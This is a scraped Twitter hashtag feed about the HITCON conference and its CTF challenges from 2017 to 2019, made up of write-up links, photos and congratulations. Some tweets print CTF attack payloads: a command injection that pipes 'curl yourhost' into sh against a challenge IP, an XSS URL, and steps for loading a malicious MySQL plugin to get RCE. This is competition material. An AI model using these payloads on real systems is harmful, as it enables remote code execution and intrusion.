-
#hitcon GoGo PowerSQL unintended RCE solution: 1. Pollute environment variable 2. libmysqlclient will load plugin from LIBMYSQL_PLUGINS 3. But it will append annoying .so 4. Bypass by sending 512 bytes ./././ ... 5. Load the malicious plugin from /proc/self/fd/0 6. Profit
-
curl 'http://13.115.136.15/?url=a&filename=|curl+yourhost|sh';curl 'http://13.115.136.15/?url=file:|curl+yourhost|sh'
#HITCON SSRFme writeup -
Many good talks in these two days! Good job
#hitcon and thank u
pic.twitter.com/JNhcqS87vg
-
My team with myself included solved all
from this year #hitcon ctf. I also managed to get the first blood on Bounty Pl33z with this unintended solution :) http://3.114.5.202/fd.php?q=%60%7D%2b%22%2balert(1337);x=%60%7D%7B(class%20$%7By=%60Prikaži ovu nit -
This is so insane. This was a straight-forward solution for Buggy .Net from
#hitcon https://twitter.com/irsdl/status/1016373911406174208 …pic.twitter.com/7PPoB4XmSI
Prikaži ovu nit -
I designed a simple pwnable challenge on a MCU chip with tiny TrustZone on it for this year's
#HITCON Badge Challenge. Pwn the badge for all patterns! Badge source code, hardware designs and exploits are now released: https://github.com/yuawn/HITCON-badge-2019 … -
My writeup for [HITCON 2019 CTF] One Punch Man, there's no check while unlinking chunks from small bin into tcache, hmm... https://medium.com/@ktecv2000/hitcon-ctf-2019-quals-one-punch-man-pwn-292pts-3e94eb3fd312 …
#HITCON#HITCON_2019_CTF -
Working on this for quite a while, this year
#HITCON 2018 Badge - Cold wallet with Secure Element! pic.twitter.com/3lggCaaHYi
-
Those pictures are HITCON CTF competition environment. Using 4 rented server to host all virtual machines. Actually, in first picture, all machine are putting on the folding hand cart during the hold competition.
#HITCON#HITCON-CTF pic.twitter.com/invFq2Te2T
Prikaži ovu nit -
The competition is over!Thank you for your hard work!
#HITCON pic.twitter.com/1z1OHsZP9b
-
Write-up for "One Line PHP Challenge" by
@orange_8361, worth reading! https://hackmd.io/s/B1A2JIjjm#PHP#HITCON#CTF#mindblowing -
This libwww-perl vulnerability was a 0-day on
#HITCON CTF (SSRF Me challenge). A CTFer reported it: https://github.com/libwww-perl/libwww-perl/pull/270 … -
Mini Hardenig in HITCON CMT 2019 will start soon!
#HITCON pic.twitter.com/epsENu79qz
-
-
HITCON CTF 2019 Final competition hardware equipments How many equipment you can recognize?
#HITCON pic.twitter.com/r8vQqfy0yU
Prikaži ovu nit -
This is how we got first solve in EV3-Arm Now I and
@okascmy1 hve EV3’s arm#hitcon#hitconctfpic.twitter.com/3jnBYnUKOP
-
We got 2nd place in HITCON Quals 2019! HITCON is definitely one of the best CTFs! We really learn a lot in this one. Let's give the organizers a standing ovation
.
#hitcon#ctf#hitconctfpic.twitter.com/KbS15AUAMj
Prikaži ovu nit -
My writeup for the "Secret Note" challenge in HITCON CTF 2018 - unfortunately I didn't have much time to play, but it was an amazing CTF!
#hitcon#hitconctfhttps://abiondo.me/2018/10/23/hitcon18-secretnote/ … -
-
Official writeup of Real Ruby Escaping in hitcon-quals-2017
#hitconctf#HITCON#Ruby#Pwn https://david942j.blogspot.tw/2017/11/official-write-up-hitcon-ctf-2017.html …
Čini se da učitavanje traje već neko vrijeme.
Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.